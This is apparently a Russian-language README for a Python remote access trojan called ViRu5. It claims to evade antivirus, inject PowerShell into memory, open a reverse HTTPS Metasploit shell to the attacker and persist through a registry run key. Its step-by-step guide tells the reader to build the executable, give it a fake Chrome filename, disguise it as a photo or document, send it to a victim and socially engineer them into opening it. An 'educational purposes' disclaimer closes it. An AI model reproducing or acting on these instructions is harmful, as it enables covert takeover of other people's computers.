python-rootkit
Это полностью необнаруживаемый Python RAT, который обходит практически все антивирусы и открывает бэкдор на любой машине Windows, устанавливая обратное https-соединение Metasploit с вашей прослушивающей машиной.
Жизненный цикл ViRu5
- Обходит все антивирусы.
- Внедряет вредоносный PowerShell-скрипт в память.
- Устанавливает обратное https-соединение с машиной атакующего.
- Проверяет каждые 10 секунд, что соединение всё ещё существует. Если нет — восстанавливает новое соединение.
- Добавляет ключ реестра автозагрузки для повторного подключения к атакующему после перезагрузки.
Шаги
- Обновите параметры viRu5/source.py, указав ваш lhost и lport.
- Переименуйте source.py в GoogleChromeAutoLaunch.py.
- Добавьте GoogleChromeAutoLaunch.py, setup.py и вашу иконку как icon.ico в директорию c:\python27.
- В командной строке выполните
cd c:\python27 && python setup.py py2exe
- Найдите RAT-файл в директории Dist.
- Замаскируйте его любым фото, PDF, Word или другим типом файлов.
- Отправьте его жертве.
- Используйте свои навыки социальной инженерии, чтобы заставить его открыть файлы.
- Вы получите обратное https-соединение Metasploit :)
Тестировалось на
- Windows 7 x64/x86
- Windows 8
- Windows 8.1 x64/x86
- Windows 10 x64/x86
Благодарности
Спасибо каждому исследователю безопасности, кто тратит время на помощь людям и делает сообщество сильнее. Спасибо ребятам из PowerSploit.
Предупреждение
Данный материал предназначен исключительно для образовательных целей. Прежде всего, этот код призван привлечь внимание к проблемам безопасности на незапатченных машинах.